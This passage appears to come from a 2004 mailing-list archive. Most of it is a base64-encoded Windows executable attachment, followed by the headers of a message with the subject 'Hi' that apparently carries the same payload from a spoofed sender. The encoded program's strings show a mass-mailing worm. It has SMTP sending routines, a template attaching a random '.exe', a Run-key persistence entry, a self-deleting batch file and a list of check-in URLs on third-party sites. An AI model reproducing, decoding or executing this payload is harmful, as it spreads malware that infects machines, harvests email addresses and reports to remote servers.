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 V0AA6CQPAABqAFBorFdAAFPoZA8AAGoPaAAEAAD/dfxT6NX2//+FwHRs/3X86Cn9//89MzU0 AHVd/3X46I3w//+LVfiLEo1F7FBoAAQAAP918P91+P9SDIN97AB2FGoA/3Xs/3XwU+gODwAA hcB+JuvPag9oAAQAAP91/FPoefb//4XAdBD/dfzozfz//z0yNTAAdQFHU+iuDgAA/3X86KHv ////dfDoLA4AAP91+OiR7////3X06Inv//+Lx1tfXsnCDABVi+xWU2pAagD/dQzowg4AAAvA dB9AUOgw/P//i/ALwHQSVv91CP91DOh5AwAAVujfDQAAW17JwggAVYvsU1ZXi3UQVugeDgAA UIt9FGoQakDotw0AAIvYi1UIi00MgzoAdQSJGusHUYsJiVkIWYkZWIPABFBqQOiRDQAAiQP/ dRBQ6NoNAACJewT/dRiPQwxfXlvJwhQAVYvsgcQk////jUXQUOg0DQAAah6NReFQaLxXQACN RdBQagBqCegKDQAAjUXhUP91COiUDQAAah6NReFQaNBXQACNRdBQaghqCegWDQAAjUXhUP91 COhkDQAAjYUk////UOgEDQAAi4Uk////99iZuTwAAAD3+YXSfQL32lJQaNpXQACNReFQ6EoN AACDxBCAfeEwdQTGReErjUXhUP91COgZDQAAycIEAFWL7IPEsGoUjUXiUOhK6v//ahONReJQ 6GLq//+NRbBQ6DL///9qQGoA/3UM6GINAAALwHQjkv91EFKNReJQ/3UM/3UIjUWwUGisVEAA /3UU6NgMAACDxCDJwhAAVYvsg8TYjUX8UOjC7f//aAAIAABqQOhWDAAAiUXYah6NRd5Q6Nbp //9qD41F3lDoDur///912I1F3lD/dQj/dQzoXv////912Oh9DAAAi1X8ixJqAFD/ddj/dfz/ UhCNRd5QaD5VQAD/ddjoYQwAAIPEDP912OhQDAAAi1X8ixJqAFD/ddj/dfz/UhCLVfyLEmoA aixoZ1ZAAP91/P9SEItV/IsSagBqAmjjV0AA/3X8/1IQjUXeUGieVUAA/3XY6AwMAACDxAz/ ddjo+wsAAItV/IsSagBQ/3XY/3X8/1IQi1X8ixJqAP81GH9AAP81FH9AAP91/P9SEI1F3lBo TVZAAP912OjGCwAAg8QM/3XY6LULAACLVfyLEmoAUP912P91/P9SEP912OhICwAAi0X8ycII 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 5v//agBqBWoB/3UM/3UI6Fnr//+FwA+EXAIAAP91DOjo5f//i1UMixJqAGoBjYWu/v//UP91 DP9SDP91DOjd5f//gL2u/v//AnQXgL2u/v//A3QOgL2u/v//BHQF6RYCAABqBWoAaMgAAAD/ dQz/dQjoYOv//4XAD4T6AQAA/3UM6Ibl//+LVQyLEmoAaMgAAACNhTf///9Q/3UM/1IM/3UM 6Hjl//9oAFBAAI2FN////1DopgMAAAvAdAXptwEAAPyNvTf///+4AQAAAKuhA1BAAKtqAGoI jYU3////UP91COjRAwAAgL2u/v//AnQNgL2u/v//Aw+FbQEAAGoAagRqBP91DP91COhf6v// hcAPhGIBAAD/dQzo7uT//4tVDIsSagBqBI2FqP7//1D/dQz/Ugz/dQzo4+T//2oAagT/taj+ ////dQz/dQjoHOr//4XAD4QfAQAA/3UM6Kvk//9oBAEAAI2FN////1DomAIAAGoFjYWv/v// UOhB4P//aPlXQACNhTf///9Q6McCAACNha/+//9QjYU3////UOi0AgAAaAdYQACNhTf///9Q 6KMCAABqAGoAagJqAGoCaAAAAECNhTf///9Q6MgBAACJhaD+//9AD4SbAAAAi1UMixKNhaT+ //9QaIAAAACNhbf+//9Q/3UM/1IMg72k/v//AHQjagCNhaT+//9Q/7Wk/v//jYW3/v//UP+1 oP7//+gtAgAA67b/taD+///oVAEAAIC9rv7//wN1EWgBWEAAjYU3////UOgMAgAAagCNhTf/ //9Q6PIBAACAva7+//8DdRXouuD//+sOgL2u/v//BHUF6Krg////dQjoCAIAAP81HH9AAOij AQAAM8BbX17JwggAVYvsg8TwVldT/wVYV0AAjUX8UOjE4v//agFqBWoI/3X8/3UI6LDo//// dfzoR+P//2oIjUX0UOjO3v//i1X8ixJqAGoIjUX0UP91/P9SDI119IA+Q3UagH4B/3UUZoN+ Av91Df91/P91COjG/P//6wLrAusI/3UI6HcBAAD/dfzoauL///8NWFdAADPAW19eycIEAGoA 6JUBAADon+b//4M9A1BAAAB1FGjIrwAA6AHh//8FiBMAAKMDUEAAaFxXQABo9jBAAP81A1BA AOiw6v//6Dr8//+DPVRXQAAAdAXo8/r//2joAwAA6LEAAADr9Mz/JaRAQAD/JbhAQAD/JbRA QAD/JbBAQAD/JaxAQAD/JZxAQAD/JaBAQAD/JahAQAD/JSRAQAD/JShAQAD/JSxAQAD/JTBA QAD/JTRAQAD/JThAQAD/JTxAQAD/JUBAQAD/JURAQAD/JUhAQAD/JUxAQAD/JVBAQAD/JVRA QAD/JVhAQAD/JVxAQAD/JWBAQAD/JbxAQAD/JWRAQAD/JWhAQAD/JWxAQAD/JXBAQAD/JXRA QAD/JXhAQAD/JXxAQAD/JYBAQAD/JYRAQAD/JYhAQAD/JYxAQAD/JZBAQAD/JZRAQAD/JZhA QAD/JeRAQAD/JTBBQAD/JShBQAD/JSRBQAD/JSBBQAD/JRxBQAD/JRhBQAD/JRRBQAD/JQxB QAD/JQBBQAD/JQRBQAD/JQhBQAD/JRBBQAD/JSxBQAD/JcRAQAD/JchAQAD/JdxAQAD/JdRA QAD/JdhAQAD/JdBAQAD/JfhAQAD/JfRAQAD/JfBAQAD/JexAQAD/JRRAQAD/JRBAQAD/JQxA QAD/JQhAQAD/JRxAQAD/JQBAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALhHAAAAAAAAdkcAAGJHAABSRwAA REcAAAAAAACWRwAAAAAAALZDAADCQwAA1EMAAORDAAD2QwAACEQAABhEAAAmRAAANkQAAFBE AABmRAAAfEQAAIxEAACeRAAAuEQAANBEAADsRAAA+kQAAAZFAAAWRQAAJkUAAC5FAABGRQAA WEUAAG5FAAB4RQAAhEUAAJBFAACcRQAAqEUAAIhDAACYQwAAOEMAAKhDAAByQwAAZEMAAFhD AABGQwAA3kQAAAAAAAB2RgAAhkYAAAAAAADKRgAAskYAAL5GAACoRgAAAAAAAMJFAAAAAAAA JEcAABRHAAD4RgAA4kYAAAAAAAA8RgAARkYAAE5GAAAwRgAAWEYAACJGAAASRgAACEYAAPpF AADyRQAA6EUAAGBGAADaRQAAAAAAACRCAAAAAAAAAAAAALRFAAAkQAAA5EIAAAAAAAAAAAAA zkUAAORAAAAAQwAAAAAAAAAAAABqRgAAAEEAAMRCAAAAAAAAAAAAAJ5GAADEQAAA0EIAAAAA AAAAAAAA1kYAANBAAADsQgAAAAAAAAAAAAA4RwAA7EAAAAhCAAAAAAAAAAAAAIhHAAAIQAAA HEIAAAAAAAAAAAAAqkcAABxAAAAAQgAAAAAAAAAAAADIRwAAAEAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAuEcAAAAAAAB2RwAAYkcAAFJHAABERwAAAAAAAJZHAAAAAAAAtkMAAMJDAADUQwAA 5EMAAPZDAAAIRAAAGEQAACZEAAA2RAAAUEQAAGZEAAB8RAAAjEQAAJ5EAAC4RAAA0EQAAOxE AAD6RAAABkUAABZFAAAmRQAALkUAAEZFAABYRQAAbkUAAHhFAACERQAAkEUAAJxFAACoRQAA iEMAAJhDAAA4QwAAqEMAAHJDAABkQwAAWEMAAEZDAADeRAAAAAAAAHZGAACGRgAAAAAAAMpG AACyRgAAvkYAAKhGAAAAAAAAwkUAAAAAAAAkRwAAFEcAAPhGAADiRgAAAAAAADxGAABGRgAA TkYAADBGAABYRgAAIkYAABJGAAAIRgAA+kUAAPJFAADoRQAAYEYAANpFAAAAAAAAGgBDbG9z ZUhhbmRsZQAdAENvbXBhcmVGaWxlVGltZQAkAENvcHlGaWxlQQAwAENyZWF0ZUZpbGVBADEA Q3JlYXRlRmlsZU1hcHBpbmdBAAA7AENyZWF0ZU11dGV4QQAARgBDcmVhdGVUaHJlYWQAAIAA RXhpdFByb2Nlc3MAjwBGaW5kQ2xvc2UAkwBGaW5kRmlyc3RGaWxlQQAAnABGaW5kTmV4dEZp bGVBAMgAR2V0Q29tbWFuZExpbmVBAN8AR2V0RGF0ZUZvcm1hdEEAAOgAR2V0RHJpdmVUeXBl QQD1AEdldEZpbGVTaXplAP4AR2V0TG9jYWxUaW1lAAABAUdldExvZ2ljYWxEcml2ZVN0cmlu Z3NBAAcBR2V0TW9kdWxlRmlsZU5hbWVBAAA8AUdldFN5c3RlbURpcmVjdG9yeUEAUgFHZXRU aWNrQ291bnQAAFMBR2V0VGltZUZvcm1hdEEAAFUBR2V0VGltZVpvbmVJbmZvcm1hdGlvbgAA YgFHZXRXaW5kb3dzRGlyZWN0b3J5QQAAZwFHbG9iYWxBbGxvYwBuAUdsb2JhbEZyZWUAAKoB TG9jYWxBbGxvYwAArgFMb2NhbEZyZWUAugFNYXBWaWV3T2ZGaWxlAP0BUmVsZWFzZU11dGV4 AABgAlNsZWVwAGUCU3lzdGVtVGltZVRvRmlsZVRpbWUAAHcCVW5tYXBWaWV3T2ZGaWxlAI8C V2FpdEZvclNpbmdsZU9iamVjdACUAldpbkV4ZWMAngJXcml0ZUZpbGUAtQJsc3RyY2F0QQAA uQJsc3RyY21waUEAuwJsc3RyY3B5QQAAvwJsc3RybGVuQQAAa2VybmVsMzIuZGxsAABiAndz cHJpbnRmQQB1c2VyMzIuZGxsAAAhAFdTQVN0YXJ0dXAAACQAYWNjZXB0AAAlAGJpbmQAACYA Y2xvc2Vzb2NrZXQAJwBjb25uZWN0ACoAZ2V0aG9zdGJ5bmFtZQArAGdldGhvc3RuYW1lADYA aW5ldF9hZGRyADoAbGlzdGVuAAA+AHJlY3YAAEMAc2VsZWN0AABEAHNlbmQAAEkAc29ja2V0 AAB3c29jazMyLmRsbAAxAENvSW5pdGlhbGl6ZQAAawBDcmVhdGVTdHJlYW1PbkhHbG9iYWwA b2xlMzIuZGxsANcAU3RyRHVwQQDmAFN0clJDaHJBAADzAFN0clN0cklBAAD6AFN0clRyaW1B AABzaGx3YXBpLmRsbABpAEludGVybmV0Q2xvc2VIYW5kbGUAewBJbnRlcm5ldEdldENvbm5l Y3RlZFN0YXRlAIYASW50ZXJuZXRPcGVuQQCHAEludGVybmV0T3BlblVybEEAAHdpbmluZXQu ZGxsAIABUmVnQ2xvc2VLZXkAgwFSZWdDcmVhdGVLZXlBAKMBUmVnUXVlcnlWYWx1ZUV4QQAA rgFSZWdTZXRWYWx1ZUV4QQAAYWR2YXBpMzIuZGxsAAAqAEdldE5ldHdvcmtQYXJhbXMAAGlw aGxwYXBpLmRsbAAAbgBTaGVsbEV4ZWN1dGVBAFNIRUxMMzIuZGxsAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMTIAeRoAADE1MS4yMDEuMC4zOQAAAAAA AAAAAC53YWIALnR4dAAuaHRtAC5odG1sAAAucjEAQGhvdG1haWwuY29tAEBtc24uY29tAEBt aWNyb3NvZnQAQGF2cC4AACVzP3A9JWx1JmlkPSVzAGh0dHA6Ly93d3cuZWxyYXNzaG9wLmRl LzEucGhwAGh0dHA6Ly93d3cuaXQtbXNjLmRlLzEucGhwAGh0dHA6Ly93d3cuZ2V0eW91cmZy ZWUubmV0LzEucGhwAGh0dHA6Ly93d3cuZG1kZXNpZ24uZGUvMS5waHAAaHR0cDovLzY0LjE3 Ni4yMjguMTMvMS5waHAAaHR0cDovL3d3dy5sZW9uemVybml0c2t5LmNvbS8xLnBocABodHRw Oi8vMjE2Ljk4LjEzNi4yNDgvMS5waHAAaHR0cDovLzIxNi45OC4xMzQuMjQ3LzEucGhwAGh0 dHA6Ly93d3cuY2Ryb21jYS5jb20vMS5waHAAaHR0cDovL3d3dy5rdW5zdC1pbi10ZW1wbGlu LmRlLzEucGhwAGh0dHA6Ly92aXB3ZWIucnUvMS5waHAAaHR0cDovL2FudG9sLWNvLnJ1LzEu cGhwAGh0dHA6Ly93d3cuYmFncy1kb3N0YXZrYS5tYWdzLnJ1LzEucGhwAGh0dHA6Ly93d3cu NXgxMi5ydS8xLnBocABodHRwOi8vYm9zZS1hdWRpby5uZXQvMS5waHAAaHR0cDovL3d3dy5z dHRuZ2RhdGEuZGUvMS5waHAAaHR0cDovL3doOS50dS1kcmVzZGVuLmRlLzEucGhwAGh0dHA6 Ly93d3cubWljcm9udWtlLm5ldC8xLnBocABodHRwOi8vd3d3LnN0YWR0aGFnZW4ub3JnLzEu cGhwAGh0dHA6Ly93d3cuYmVhc3R5LWNhcnMuZGUvMS5waHAAaHR0cDovL3d3dy5wb2xvaGV4 ZS5kZS8xLnBocABodHRwOi8vd3d3LmJpbm84OC5kZS8xLnBocABodHRwOi8vd3d3LmdyZWZy YXRocGFlbnouZGUvMS5waHAAaHR0cDovL3d3dy5iaGFtaWR5LmRlLzEucGhwAGh0dHA6Ly93 d3cubXlzdGljLXZ3cy5kZS8xLnBocABodHRwOi8vd3d3LmF1dG8taG9iYnktZXNzZW4uZGUv MS5waHAAaHR0cDovL3d3dy5wb2xvemlja2UuZGUvMS5waHAAaHR0cDovL3d3dy50d3ItbXVz aWMuZGUvMS5waHAAaHR0cDovL3d3dy5zYy1lcmJlbmRvcmYuZGUvMS5waHAAaHR0cDovL3d3 dy5tb250YW5pYS5kZS8xLnBocABodHRwOi8vd3d3Lm1lZGktbWFydGluLmRlLzEucGhwAGh0 dHA6Ly92dmNnbi5kZS8xLnBocABodHRwOi8vd3d3LmJhbGxvbmZvdG8uY29tLzEucGhwAGh0 dHA6Ly93d3cubWFyZGVyLWdtYmguZGUvMS5waHAAaHR0cDovL3d3dy5kdmQtZmlsbWUuY29t LzEucGhwAGh0dHA6Ly93d3cuc21lYW5nb2wuY29tLzEucGhwAABEYXRlOiAlcw0KVG86ICVz DQpTdWJqZWN0OiBIaQ0KRnJvbTogJXMNCk1lc3NhZ2UtSUQ6IDwlcyVzPg0KTUlNRS1WZXJz aW9uOiAxLjANCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L21peGVkOw0KICAgICAgICBib3Vu ZGFyeT0iLS0tLS0tLS0lcyINCg0KAC0tLS0tLS0tLS0lcw0KQ29udGVudC1UeXBlOiB0ZXh0 L3BsYWluOyBjaGFyc2V0PSJ1cy1hc2NpaSINCkNvbnRlbnQtVHJhbnNmZXItRW5jb2Rpbmc6 IDdiaXQNCg0KAC0tLS0tLS0tLS0lcw0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LW1z ZG93bmxvYWQ7IG5hbWU9IlslJVJBTkQlJV0uZXhlIg0KQ29udGVudC1UcmFuc2Zlci1FbmNv ZGluZzogYmFzZTY0DQpDb250ZW50LURpc3Bvc2l0aW9uOiBhdHRhY2htZW50OyBmaWxlbmFt ZT0iWyUlUkFORCUlXS5leGUiDQoNCgANCg0KLS0tLS0tLS0tLSVzLS0NCg0KLg0KACBUZXN0 ID0pDQpbJVJBTkQlXVslUkFORCVdDQotLQ0KVGVzdCwgeWVwLg0KOmwNCmRlbCAlMQ0KaWYg ZXhpc3QgJTEgZ290byBsDQpkZWwgJTAAYS5iYXQAb3BlbgBxAgAAzQ0BAAAAAAAAAAAAAAAA AAAAAAAAAAAAY2FsYy5leGUAb3BlbgBTT0ZUV0FSRVxXaW5kb3dzOTgAdWlkAFNPRlRXQVJF XE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFJ1bgBkM2R1cGRhdGUuZXhlAFxi YmVhZ2xlLmV4ZQBmcnVuAAAAAAAAAAAAAAAAAAAsACAsDQoAPAA+AENDOiAAQkNDOgBUbzog AEhFTE8gJXMNCgBSU0VUDQoATUFJTCBGUk9NOjwlcz4NCgBSQ1BUIFRPOjwlcz4NCgBEQVRB DQoAWyVSQU5EJV0AZGRkJywnIGRkIE1NTSB5eXl5IABISDptbTpzcyAAJTAzaSUwMmkADQpc ACouKgBiZWFnbGVfYmVhZ2xlAFxic3VwbGQAIC11cGQALmV4ZQAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAgADAAAAIAAAgA4AAAA4AACAAAAAAAAAAAAAAAAAAAABAAEAAABQAACA AAAAAAAAAAAAAAAAAAABAAEAAABoAACAAAAAAAAAAAAAAAAAAAABAAAAAACAAAAAAAAAAAAA AAAAAAAAAAABAAAAAACQAAAAoJAAAOgCAAAAAAAAAAAAAIiTAAAUAAAAAAAAAAAAAAAoAAAA IAAAAEAAAAABAAQAAAAAAIACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAICAAIAA AACAAIAAgIAAAMDAwACAgIAAAAD/AAD/AAAA//8A/wAAAP8A/wD//wAA////ABERERERERER ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER EREREREREREREREREREREREREQAAAAAAAAAAAAAAAAAAARZkREREREREREREREREREAW5mZm ZmZmZmZmZmZmZmZAFvZgAGAAYABgAGAAAABmQBbmb3BvcG9wb3Bvd3dwZkAW9m/wb/Bv8G/w b///8GZAFuZmZmZmZmZmZmZmZmZmQBb2YABgAGAAYABgAGAAZkAW5m9wb3BvcG9wb3BvcGZA FvZv8G/wb/Bv8G/wb/BmQBbmZmZmZmZmZmZmZmZmZkAW9mAAYABgAGAAYABgAGZAFuZvcG9w b3BvcG9wb3BmQBb2b/Bv8G/wb/Bv8G/wZkAW5mZmZmZmZmZmZmZmZmZAFvZgd3d3d3d3d2Zm ZmZmQBbmYP////////dmZmZmZkAW9mB3d3d3d3d3ZmZmZmZAFuZgAAAAAAAAAGZmZmZmQBb+ /v7+/v7+/v7+/v7+/kARZmZmZmZmZmZmZmZmZmZhERERERERERERERERERERERERERERERER ERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERER ERERERERERERERERERERERER///////////////////////////AAAABgAAAAIAAAACAAAAA gAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAA AACAAAAAgAAAAMAAAAH///////////////////////////////8AAAEAAQAgIBAAAQAEAOgC AAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= ----------255038165501247-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0J34Dib003123; Sun, 18 Jan 2004 19:04:13 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0J34Dd8003122; Sun, 18 Jan 2004 19:04:13 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from YANZG ([211.100.11.103]) by above.proper.com (8.12.10/8.12.8) with SMTP id i0J34Aic003109 for <ietf-pkix@imc.org>; Sun, 18 Jan 2004 19:04:11 -0800 (PST) (envelope-from tytso@MIT.EDU) Date: Mon, 19 Jan 2004 11:04:37 +0800 To: ietf-pkix@imc.org Subject: Hi From: tytso@MIT.EDU Message-ID: 